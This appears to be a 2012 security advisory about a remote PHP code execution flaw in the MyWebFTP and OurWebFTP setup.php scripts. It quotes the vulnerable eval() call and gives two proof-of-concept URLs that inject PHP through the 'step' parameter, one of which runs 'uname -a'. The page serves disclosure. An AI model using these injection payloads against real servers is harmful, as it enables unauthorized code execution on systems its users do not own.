MyWebFTP 5.3.3 & OurWebFTP 5.3.4 Remote PHP Code Execution Vulnerability

2012.07.24

Credit: condis

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-94

MyWebFTP 5.3.3 & OurWebFTP 5.3.4 Remote PHP Code Execution Vulnerability
by condis
04.10.2011
download: http://www.mywebftp.com/download.php
http://www.ourwebftp.com/download.php
Source of setup.php:
30. start_html();
31. if( checkReady() ){ [1]
32. init();
33. listSetupOptions();
34. if ( isset($_REQUEST['step']) ){
35. $step = $_REQUEST['step'];
36. eval("step_$step();"); [!]
37. }
To exploit this issue, everything must be configured propely so that installation
can be done without any errors [1]. To meet these conditions all you have to do
is make sure that there is directory with name defined in LD_DIR const with
permission to write into it, and that the administrator haven't deleted setup.php
Proof of Concept:
http://host.tld/myftpdir/setup.php?step=;phpinfo();//
http://host.tld/myftpdir/setup.php?step=;print_r(`uname -a`);//

References:

http://www.mywebftp.com/download.php

http://www.ourwebftp.com/download.php

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

MyWebFTP 5.3.3 & OurWebFTP 5.3.4 Remote PHP Code Execution Vulnerability

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.